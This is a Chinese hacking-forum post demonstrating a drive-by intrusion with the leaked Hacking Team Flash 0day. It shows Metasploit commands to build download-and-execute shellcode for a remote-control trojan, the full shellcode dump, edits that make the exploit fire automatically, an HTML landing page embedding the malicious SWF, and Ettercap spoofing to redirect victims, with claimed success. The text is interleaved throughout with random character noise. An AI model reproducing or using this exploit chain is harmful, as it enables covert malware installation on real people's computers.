找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1358|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 u0 N) S* t) N9 e$ e2 J0 X 三、flash 0day之手工代码修改制作下载者实例入侵演示 - f% r6 B) G* d

9 O$ U' h+ A& H2 d ^

( x' T7 j5 g ]0 _3 l) c# n3 w 利用到的工具: / n; R9 [, |7 Y+ ?

' _! J) J) S: ^1 a5 M

* T C! H3 L7 K* t6 Y Msf 5 h6 d2 @% R T8 J/ E* A8 B

4 n W& K$ B0 c I! h2 J; Q- h

! e8 c, z* j- f3 w# ~+ B7 H Ettercap 7 E4 K) @: n) p$ l

! ]1 |# f7 f9 F& q* J. }4 c, G

+ \9 q$ _' _: a Adobe Flash CS6 5 T3 n6 F# F" d7 t" K

4 W% i- M L) Z) f' z

0 Q+ S2 a0 K- H7 t Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 V- W& x# ~( N, n

6 J% B5 T" m3 p Z* `" u

O7 V5 K$ ]$ S) e# Y 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options A! i2 Z! l$ w) H* Q

6 @; J o2 n! Y+ i" V

3 [' I+ ~: x3 M) g% k8 U 如图: * H1 I1 B& w% ~6 U0 i& z0 v2 w

0 E6 r9 k7 { G- `. c8 R9 K4 o

/ t( X2 k1 v. Q   4 P8 h6 N* |( E) u

0 R2 [; d" {1 I$ J4 M, v7 H; [9 {: F

# ~, |4 [2 t- J* J' |% l6 v   ! [9 U3 P, S& e5 y: F

& J6 f! [; {2 B) V4 P9 h5 {+ @

# m, T/ P5 M& _5 P, p0 ?% j0 \: i 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' ^9 U2 x! c. L

. N! z, H4 C2 j' v% M Y

a7 F% a4 c J% G# O# I$ C   $ o _3 C1 {1 q$ q

9 ^" @+ {9 _& H: f

/ q( I+ [1 E- z# }, H& ]   E9 h$ h; s e+ y, ~6 {' j! m

6 G6 n, Z2 f) C* E: q E( X

% n! f2 l( a. _7 a5 z+ d6 b, T, J 然后执行generate -t dword生成shellcode,如下: \$ A/ y( A2 s- ]+ P7 D. p: K

% w2 a+ [) r8 s) ~# \; P% o

* C0 y$ q" Z6 u0 D) N% A# F   - p4 A8 f8 a2 Q( D6 ~( G

2 s' `" l. i" h$ `; i+ S

. Y" d4 g# C. Z+ v 复制代码到文本下便于我们一会编辑flash exp,如下: 8 r! R4 C- H& {/ S e4 @* @

( U8 |: z" U4 d- s" y2 e4 x

1 N2 w; b4 D T M9 u 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 m! r8 J% p1 Y8 n

5 a( T% J/ C8 H2 v( T$ W

/ ~+ ~& c8 G+ D 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 7 @) x2 x. y# t8 I+ @ @" n

$ \( B4 A7 m7 M9 a* t$ i0 h. y

) f$ |- V. T. W9 _3 B8 s0 B5 Q 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 5 q, e# p# B+ v' ?

i }" r K. t3 ]4 `- W9 K2 E. P

( x! g* [, H4 N 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 7 {; g% @# [1 E" `8 u$ G9 \, g

& ~' Z3 Q" x% e( ^5 d

; W j% u. f" w& K6 ? 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, % t. g7 A- U- R

) u# }" H7 T- Z$ W5 U0 U

. [9 t+ C, h, e: w$ n- I 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, . B3 j0 {- h( o! c b$ r! f

# z0 ]( ?, F2 t: y

; V2 Y( j& S0 i, E$ @0 s( J! v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 2 N# b- w" y3 f+ B

# a0 n; C3 o4 }6 `# I9 A

: P8 E* d: D, V5 s) h+ k3 E& W( r 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - N4 L2 Y) X9 @# j& M% L

) m' D' x, B* F: v( V, x8 T

; R/ W4 A3 e `8 T; k% y0 R 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 f/ X' [2 j% j% B/ }' F+ q

" C" i. J5 _9 S e5 K

- t) m: n) g; @5 |: n 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . K, M% i8 e7 Z

3 M' t: Y' J: C& L' L0 y2 c* U4 k' o

, l4 |4 d+ m7 ` q* ~: i 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ! C# v; e4 d/ i& n

2 z: Q8 q. n0 P( Q V& l7 h% |; }

( Q3 O) j: w$ W: C/ F' Q: [ 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ; z$ h5 t# r+ f5 L9 \$ S

# ]) F% l9 f- m' @ \- \, d* \

8 |% ?& d* q+ R6 b+ C( T9 d( f4 M 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, / c3 A7 x# x% D# g E& H

9 E( ~' u4 l( e( ?/ Q- D! b

2 ], }' K9 G; i ]3 ~5 G' L 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 + N& x9 K$ J! h4 H$ @! Q! L

- r" a& D5 w# h6 ^4 k

( ^' y0 t1 Y: V3 i7 |9 u   9 K/ u! I! P1 p- N

2 x: D. ] M7 t; x, B$ H3 O

) @, T1 J5 G( U9 C- E   6 M& i: Z6 o5 d2 h2 B9 g: z

( l& \9 s! f2 W% L% d

8 R# ^* h7 w) a1 R7 Q 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 0 x) q7 f, [+ M( w5 h

: ?* Z% f3 M W0 d2 I

4 L, Y# {8 e5 l5 g: T   - e( a- n$ c8 {) u

7 K4 u5 e( O- ^4 I' Q7 q! F

3 v" Q+ \& y( C 先修改ShellWin32.as,部分源代码如图: 7 D) f5 o' Q1 P' a: j8 V# P* U1 t& [

* n& I0 ^! R( m# O6 J

1 F/ k/ ~( l ]7 u/ W: Y6 ^   + p9 c" X! r$ N" j5 m

( `+ y3 _- c# ~2 R: x+ r% H& U; v

# O. A( a g y9 J' \+ I% \8 Z 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: " C" x I0 ~/ L

& r& b4 }. _$ K- d: z

4 U. D6 x. {0 a, Z% J" U4 Q   2 e! }: y% @) ~* Z v- _1 R

# z0 J& e6 ?5 ?

0 u. q# \2 m% u Y 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ) D( v# O. x8 H" O1 d5 Q

0 _0 E( K$ {1 ^& H5 \

* G9 |# \6 T* \+ e1 ?6 U0 Y6 |   # i4 ~ I- [" M8 G. |- i0 a8 H1 E

D! x: e4 O b8 B

4 Z; ^/ z$ I# ^, H 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 Y3 N8 D. l" \

3 R3 N( I- ~" J! d7 L+ c

' ]4 a7 M, v- G1 |5 j) G   # W$ f( i" }( m0 N! O1 {. m

1 B5 r" [ e0 `* e5 ]4 j

9 v% k- ^, S M, d   ; L( t. M& V5 Z# ~1 g

1 V' g: B. A1 C0 e/ M8 k- E

# I7 J# z& c( H; v   : s! f- E- i* f- R; d! q. ^

, R+ l; q! X1 V: ^$ z

6 K# W! _" I! H7 }% Q0 i: ]; X, h5 z 然后点保存,下面我们来编译一下,打开 5 |/ m2 X7 `+ ]4 q% w2 C- |

3 U; O' g" u8 Z

% a; t# N# i# Z5 | Y3 Y8 e9 J exp1.fla然后点文件-发布,看看编译没错误 - _+ G3 p# K6 }4 t

$ `. d4 o& K ]( ^3 T5 B3 r

7 u* z1 D y" U   ! i, R& `" c( N! h

/ L7 _+ |9 k8 J% r

! Q/ T( O. i8 q ?! j3 _3 m- y   & g5 n* u8 g! c3 ?2 M7 X% D

8 v# E4 }' i Y; r& K& g1 w$ m

5 w# u1 _+ e. l. _   0 |* [( }1 Z: B- e; k! d

A9 Q3 p# f1 j5 P" Y; A

# A2 M k3 t' { ^ R$ U   3 r5 V& [. K. m$ ?

% ^* @% b, U" u' l# R

$ T% ^! x; Q% F1 h+ |( C. e 然后我们把生成的 / G: \9 [3 T8 e' m4 x! q0 T- b

# Z$ G* x: J9 Z- m, ^- G

& q l$ J% F# Z- c0 X* i- r6 t1 } exp1.swf丢到kailinux /var/www/html下: ) s0 m( H2 a) y3 z7 Z7 n. o$ {

L/ d# _0 c: j; G' \

7 D" h# j5 @8 u% |* Y 然后把这段代码好好编辑一下 5 m( I- }1 E4 ]5 B* k. n" }

' s9 ^' Y9 @' S' q7 p4 a

C6 X2 F, l2 O7 \+ p0 _* o9 a   5 w8 u$ F5 q _; q' k3 r

/ d% s& T1 [0 S7 c. `* [

! n3 A `7 R! E3 p+ n$ h   . h* x4 q& F6 d8 x

+ D5 _. D0 h# Y' ~

3 [, r" m9 j3 [& ^4 d6 }+ P   / x8 s C: m* l+ q! S- o$ T

$ K. O) _# ]3 l. Q+ Q- c( e; i4 d

. d [5 ?* [. g6 H0 v9 @   . p N0 O6 N! H- f! j9 D T

6 ?. D: a: I9 q( }

5 G; f. b6 @2 P) B   O9 Y/ b9 Q0 M+ [& I

- c# |& Y; t4 v1 K! \* D8 c! n6 }5 `

8 z" f/ p# c2 A; |/ F# R. S3 V$ Q5 j   4 ~* F) V5 S8 H4 j, h& O# H: \. r

. v! ^3 y# c! I+ f

" L- `2 B% l1 Z% q5 I5 L <!DOCTYPE html> 8 v+ K' e' y H5 ]7 I3 K4 q

6 P# P! `; q0 x5 E

5 s/ S9 I N% r2 h; d& j C <html> 8 ^1 w6 T4 L5 E$ B/ s

, g2 R0 S c9 B" Q) t2 N* ]$ H M

) ]" C9 I5 U- v9 R$ j7 D <head> + R' \; U8 _% ^) V; X9 F8 m/ ^

& M9 `4 v7 U/ ]0 J. C

6 y7 K* x2 W! Y5 G2 w! N6 E <meta http-equiv="Content-Type" content="text/html; : |9 d( C; o% v4 E% Q# }

6 e" z* y/ b0 e I v

9 _; k# D: C0 K/ ^ charset=utf-8"/> & V8 F" |3 Z7 G$ L) {# |) E& T

+ F9 T( l+ L8 F

2 P2 S0 a8 a, A) v7 B7 E* G) j5 O </head> ' e/ n# r: {! @2 A$ R

; Z& g6 _+ B4 R7 z

6 i; E+ H3 Y% A; T; F <body> . t; \4 \4 V: y j0 X9 [. |

0 ?2 f' f2 ]' O) M

; ~: q( q$ p' Z! L8 j <h2> Please wait, the requested page is loading...</h2> - v$ t- ?7 Y. H" q1 b) \, t

6 j2 W2 j& M# ~ ?

S) D. {( y4 p$ N: o, B: b <br> 6 h) f+ e. H: Z" F2 [" q

/ `# y& Y. R$ s% K3 _; U) J# c

; N2 Y; x! [3 X) y6 ^ <OBJECT 1 u9 P- j# K2 l( ~

{; L8 @& I. L, |/ h5 k) L2 s

& C& y d6 }8 A! I& G8 h$ ^ classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( |4 s; _! E8 R5 k4 `% r

( y8 p2 I; S8 G; g+ | |& k- |

7 f, U4 Y6 G K0 a. L/ C VALUE="http://192.168.0.109/exp1.swf"></OBJECT> , Y4 c& }7 P: n. g, B2 X ^

# [' _/ t1 {) z) N

$ J; u* x& a3 _" Y; x </body> / i# T6 Q+ [$ q. R1 X9 z+ ~

! s' z" J1 M b1 k- [0 B' G8 I

8 x, v' x- g& D0 \+ U4 C5 v* b <script> 6 g$ o, g; i- m! P6 ^- W! a5 _

# [$ i: W* @: g- w$ y6 x1 ^$ ]

- J* v. u: Z9 t3 l0 }: x, j     setTimeout(function () { ) n- z4 I7 Y: F5 a Z* Y6 x; L

& I5 t$ m# G% _- D: ?

' p* T0 ~* L/ m. T' n9 a7 H. B          6 a+ u) i/ A! z9 |/ O8 A

* ~+ b" P! }& n. K9 ?) P( q D# j; m7 W

E6 y& T/ c5 V& k) @- d window.location.reload(); 9 ?* h0 x7 M; w8 N

9 \ v4 W0 ?7 P4 V2 W3 u! v& @. C

' ~% x$ S. x, K, Y N3 n9 L     }, 10000); 7 m5 m) s' e8 Z1 N

0 {4 _" w6 s8 d! h

! _( E7 d9 L# w" k ]4 B- b% X   9 y( j# E5 _- q5 |

z7 Z: A8 M4 i( J" }% s

3 ?: E7 P. n" W S& V5 [ </script> " v4 Y. R, Q4 M- |

/ r/ z- |% }6 R# P

$ b$ a+ p$ a2 h/ M6 i& h% Y </html> ; n% X& f) C0 V8 e2 U

) _, X: D7 [ R ~4 F& z

1 u7 I& m! w/ q* J+ Y6 ?   ! ~3 B! g: ?" Y5 k Y/ B! E

: z3 ~/ R' j O

! X7 `- Z9 o1 y( }7 F4 V* k- I 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: D$ ]6 x1 |. w8 X+ h

8 Z3 {( \1 l) M/ k) ~5 V

7 J j( I5 w9 E: o" V   & h9 G$ R: q* V3 H6 e$ h+ z

( s& R, D3 ?6 }* Z! |

' `1 W* R6 d) R; ]9 A! l8 E2 Z: r   ; o7 d, d3 q0 B

2 r) u3 d9 d( L, i) e

) V0 s B. D A# T. ]   , ]0 H, @% I: d: b

5 P3 ^8 ^' g; z/ B; Z. |2 ^9 j$ b

# G" G( [" H" [( Q   ; A2 M( t* T+ `; Y. _( [* o% l

2 F0 K) Z3 `" R

3 x Z4 h& a" }8 o P f* v   1 n9 ^3 t7 u3 k4 M

9 k9 _% d+ B: i4 z% Z: [' ?

# [6 e* G% ?) g 下面我们用ettercap欺骗如图: 7 F- L" d" S2 a$ x" V4 `

~+ T; P7 H4 v

: v3 r: x) k. M/ a' `3 k. I   / X+ ~9 D& g( C- `

; x; ~* h3 g0 X. ?

* n9 Z9 b- L( M+ C$ j* _   2 |9 [7 E8 A% J: m

. W9 g5 P3 h2 G3 l

. L6 P% y: D% w7 X' j 下面我们随便访问个网站看看: + w0 {, P/ K2 H% M

$ q* {( x' A$ S7 h3 c4 t* J% o

0 s$ h# a# t3 J- ^ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: . O6 s8 I- \- a: n

4 x7 B6 Y; m) C: g+ \$ n- o6 H

q. J' k! T7 G, w, D9 z! _   4 }) r3 L+ p% h! U0 O

. B I% B2 C, y4 Z2 b

/ w* ?$ M3 S7 k4 \" h; y2 p. \ 我们看另一台, 5 f$ \- F7 e% G6 H0 o2 K: x

4 {9 X0 }* \/ |

- e* {& l& B. X9 Q8 y 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 7 E+ W& q% }6 x

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表